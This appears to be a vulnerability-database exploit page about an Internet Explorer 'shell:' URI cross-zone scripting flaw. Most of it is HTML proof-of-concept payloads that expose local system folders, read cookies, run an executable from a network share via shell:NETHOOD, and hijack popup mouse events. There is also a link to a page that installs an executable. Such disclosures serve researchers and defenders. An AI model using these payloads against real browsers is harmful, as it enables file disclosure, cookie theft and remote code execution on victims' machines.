• News
• Infocus
• Foundations
• Microsoft
• Unix
• IDS
• Incidents
• Virus
• Pen-Test
• Firewalls
• Columnists
• Mailing Lists
• Newsletters
• Bugtraq
• Focus on IDS
• Focus on Linux
• Focus on Microsoft
• Forensics
• Pen-test
• Security Basics
• Vuln Dev
• Vulnerabilities
• Jobs
• Job Opportunities
• Resumes
• Job Seekers
• Employers
• Tools
• RSS
• News
• Vulns
• Security Research

• info
• discussion
• exploit
• solution
• references

Microsoft Internet Explorer Shell: IFrame Cross-Zone Scripting Vulnerability

The following proof-of-concept has been provided:
<iframe src="shell:my music"/>

roozbeh afrasiabi <roozbeh_afrasiabi@yahoo.com> has provided the following proof of concepts, including (DiscloseNFO (IE 6+ 6SP1) & ReadCookies (IE6)):

<iframe id="Target" src='shell:windows' name="x" width="875"
height="527">
</iframe>

<iframe id="Target" src='shell:windows\system32\config\' name="x"
width="875" height="527">
</iframe>

<iframe id="Target"
src='shell:::{450D8FBA-AD25-11D0-98A8-0800361B1103}' name="x"
width="875" height="527">
</iframe>

<iframe id="Target"
src='shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\c:' name="x"
width="875" height="527">
</iframe>


<iframe id="Target"
src='shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{21EC2020-3AEA-1069-A2DD-08002B30309D}\::{7007ACC7-3202-11D1-AAD2-00805FC1270E}'
name="x" width="875" height="527">
</iframe>

<iframe id="Target" src='{E773F1AF-3A65-4866-857D-846FC9C4598A}'
name="x" width="875" height="527">
</iframe>

<a target="_blank"
href="shell:::{3E9BAF2D-7A79-11d2-9334-0000F875AE17}">click</a>

Additional proof-of-concepts were provided in the "IE ms-its: and mk:@MSITStore: vulnerability" BugTraq post by Roozbeh Afrasiabi.

Liu Die Yu has supplied a proof of concept for a 'shell:' URI remote file execution vector:
1. VICTIM VISITS A SHARED FOLDER NAMED "shared" ON A SERVER NAMED "X-6487ohu4s6x0p".
THIS WILL CREATE A SHORTCUT NAMED "shared on X-6487ohu4s6x0p" IN THE FOLDER AT "shell:NETHOOD"
2. VICTIM OPENS THIS HTML FILE WHICH EXECUTES A FILE NAMED "fileid.exe" IN THE
"shared" FOLDER:
<IMG SRC="shell:NETHOOD\shared on X-6487ohu4s6x0p\fileid.exe">



A variant of the proof of concept of the exploit listed in BID 10690 (Microsoft Internet Explorer Popup.show Mouse Event Hijacking Vulnerability) has been supplied by http-equiv.:
Just substitute the following:
1. <img src="greyhat.html" id=anch
onmousedown="parent.nsc.style.width=2000;parent.nsc.style.height=
2000;parent.pop.show(1,1,1,1);parent.setTimeout('showalert
()',3000);" style="width=168px;height=152px;background-image:url
('youlickit.gif');cursor:hand" title="click me!"></a>

2. location="shell:favorites\\greyhat[1].htm"

An additional proof-of-concept was released by http-equiv that demonstrates a method of using this issue in addition to BID 10517 to install an executable on a victim system:

http://www.malware.com/wattadrag.html

• /data/vulnerabilities/exploits/DiscloseNFO.html.txt
• /data/vulnerabilities/exploits/ReadCookies.html.txt